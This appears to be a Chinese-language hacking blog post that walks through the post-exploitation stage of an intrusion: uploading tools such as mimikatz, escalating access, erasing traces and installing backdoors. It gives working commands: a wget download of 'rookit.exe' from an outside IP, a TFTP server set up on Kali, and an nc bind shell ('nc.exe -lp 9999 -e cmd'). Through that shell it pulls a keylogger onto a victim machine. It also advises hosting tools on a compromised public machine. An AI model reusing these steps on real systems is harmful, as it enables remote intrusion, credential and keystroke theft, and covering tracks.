當前位置:
首頁 > 最新 > 後滲透階段開始

後滲透階段開始

前幾天收到一位兄弟的讚賞,在此表示感謝!

經過之前的步驟,我們應該已經可以發現主機的漏洞,並且獲取到一定的許可權

下面就進入了後滲透測試階段

在後滲透測試階段我們主要的目標就是上傳工具,許可權提升,擦除攻擊痕迹,安裝持久化後門

以上的每一個步驟都至關重要!

上傳工具

可能此時我們通過一個REC漏洞獲取了一個shell,不過僅僅一個shell的功能是有限的,為了擴大戰果,我們需要上傳更為有力的工具,比如mimikatz,wce,為以後的攻擊做準備

這裡我們針對的系統主要是Windows和Linux

在Linux上我們可以使用nc, curl, wget,這些在很多Linux發行版本中都是默認安裝的,用來遠程從我們的肉雞上下載一個tool簡直不能再方便了

wgethttp://123.123.34.3/rookit.exe

最簡單的使用方法

所以我們接下來講述的主要針對Windows

在Kali的/usr/share/windows-binaries/文件夾下有一些Windows上常用的一些工具,比如鍵盤記錄,whoami等

1.TFTP

TFTP是基於UDP協議的一個協議,與FTP協議類似,都可以提供文件傳輸

我們沒有首先採用FTP協議來進行遠程下載工具就是因為FTP需要交互輸入密碼,有時候我們獲取到的shell並非交互的,所以很難實現

TFTP是不需要身份驗證的,也就是說伺服器上有文件直接下載就行

TFTP在XP和Win2003系統中是自動安裝的,win2003還是有很大一部分伺服器在使用的,所以我就以2003來進行演示

這個是安裝win2003的截圖,很熟悉的界面,上一次安裝好想還是我在弄第一期培訓

客戶端安裝完成後我們開始配置我們的TFTP伺服器端,我們用Kali就可以完成這個伺服器的假設

在假設伺服器之前我們應該明確一點,我們的伺服器不能被反黑掉,所以在許可權控制和訪問控制方面需要做一下限定

1.新建一個目錄

mkdir ~/tftp

2.修改許可權為nobody,這是一個未登錄的許可權,許可權只能用來下載

chown –R nobody ~/tftp

3.將我們需要傳遞的工具複製到目錄中

cp /usr/share/windows-binaries/whoami.exe ~/tftp

4.開啟服務

atftpd --daemon --port 69 ~/tftp

--deamon以後台形式啟動

--port埠是69

5.檢測服務是否成功開啟

netstat –pantu | grep 69

####這裡有一個問題,我必須強調一下

此處指定的路徑必須是絕對路徑,我在上面執行指定的是一個相對路徑,這樣會導致後續下載不到文件

所以上面應該變為

atftpd --daemon --port 69 /root/Desktop/tftp/

我們就用nc來在window2003上模擬一個非交互性的shell

nc.exe –lp 9999 –e cmd

遺憾的是我發現,在win2003r2版本中並沒有默認安裝tftp

當我想要看看win2003版本時候發現沒有可用的密鑰,所以我就用一台XP來進行演示

nc.exe –lp 9999 –e cmd

這邊我們用Kali的nc去連接一下,模擬出一個遠程shell

我們在shell中執行

tftp -i 192.168.123.53 get whoami.exe

-i二進位格式

tftp -i 192.168.123.53 get klogger.exe

可以看到已經下載成功了,之後我們執行一下看看效果吧

以上只是一個簡單的小例子,通常來說我們應該把我們的程序放在公網上的一台肉雞中,在攻擊之前在肉雞上開啟服務,下載之後關閉。

更多方法敬請期待!

-END-

義大利的貓

有態度

不苟同

你們的打賞和支持是我寫下去的動力哦

喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 漫流沙 的精彩文章:

TAG:漫流沙 |